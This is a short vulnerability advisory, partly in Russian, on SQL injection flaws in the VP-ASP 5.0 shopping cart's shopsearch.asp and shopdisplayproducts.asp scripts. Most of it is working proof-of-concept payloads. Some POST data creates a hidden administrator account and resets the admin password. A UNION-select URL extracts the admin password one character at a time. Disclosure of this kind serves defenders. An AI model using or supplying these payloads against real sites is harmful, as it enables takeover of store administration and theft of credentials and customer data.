Программа: VP-ASP 5.0 

Несколько уязвимостей обнаружено в VP-ASP shopping cart. Удаленный пользователь может выполнить произвольные команды на целевой системе.
Уязвимость SQL инъекции обнаружена в ‘shopsearch.asp’ и ‘shopdisplayproducts.asp’ сценариях. Удаленный пользователь может выполнить произвольный SQL код на целевой базе данных, включая команды операционной
системы. 

Пример: 

— PoC code 1:

Платформы: Win32/MSSQL

Posting this data to shopsearch.asp creates new administrative account

Keyword=&category=5); insert into tbluser (fldusername) values (‘qasdew’)—&SubCategory=&hide=&action.x=46&action.y=6
Keyword=&category=5); update tbluser set fldpassword=’edsaqw’ where
fldusername=’qasdew’— &SubCategory=All&action.x=33 &action.y=6
Keyword=&category=3); update tbluser set fldaccess=’1′ where fldusername=’qasdew’—&
SubCategory=All&action.x=33&action.y=6

Posting this data to shopsearch.asp changes admin password

Keyword=&category=5); update tbluser set fldpassword=’edsaqw’ where
fldusername=’admin’—&SubCategory= All&action.x=33&action.y=6

— Vulnerability 2: SQL Injection vulnerability in ‘shopdisplayproducts.asp’ script

An SQL Injection vulnerability has been found in the shopdisplayproducts.asp
script. Exploitation of the vulnerability will allow remote attacker to read any
information from a database.

— PoC code 2:
Платформы: Win32/MSSQL

http://somehost.com/vpasp/ shopdisplayproducts.asp?cat= qwerty’%20union%20select%
20fldauto,fldpassword%20from%20 tbluser%20where%20fldusername=’admin’%20and %20fldpassword%20like%20’a%25′—

changing value at the end of request
%20’a%25′—
%20’b%25′—
%20’c%25′—

and looking through the HTTP response from VP-ASP web server attacker can find the admin
password.



Оставить мнение